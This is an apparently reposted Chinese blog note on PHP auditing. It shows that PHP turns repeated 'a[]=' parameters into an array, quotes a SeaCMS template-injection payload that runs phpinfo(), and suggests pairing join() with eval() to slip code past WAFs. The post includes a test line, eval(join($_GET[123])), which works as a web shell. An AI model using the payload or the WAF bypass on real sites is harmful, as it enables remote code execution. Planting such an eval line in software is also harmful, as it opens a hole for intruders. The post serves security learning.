溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

php通過http請求發(fā)送數(shù)組

發(fā)布時間:2020-08-01 15:47:44 來源:網(wǎng)絡(luò) 閱讀:493 作者:z2pp 欄目:web開發(fā)

最近開始學(xué)習(xí)php審計,剛好趕上研究seacms,就發(fā)現(xiàn)了payload處一個奇怪的點

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

9[]=ph&9[]=pinfo();

就嘗試了一下,發(fā)現(xiàn)在接收數(shù)據(jù)時,例:

鍵名=a,那傳遞a[]=a&a[]=b時,a即為一個數(shù)組,便做了個測試,果真如此

服務(wù)器端測試代碼

<?php
	print_r($_GET[1]);
?>

測試結(jié)果如下

php通過http請求發(fā)送數(shù)組

php通過http請求發(fā)送數(shù)組


那么這一個有什么用呢?思考了一下,如果服務(wù)器上有安全狗或者waf等防護工具,那么配合其他php函數(shù),例如join函數(shù),可能可以達到繞過效果

提供一個簡單思路

服務(wù)器測試代碼

<?php
	eval(join($_GET[123]));
?>

測試結(jié)果如下

php通過http請求發(fā)送數(shù)組


錯誤之處,敬請指正

向AI問一下細節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI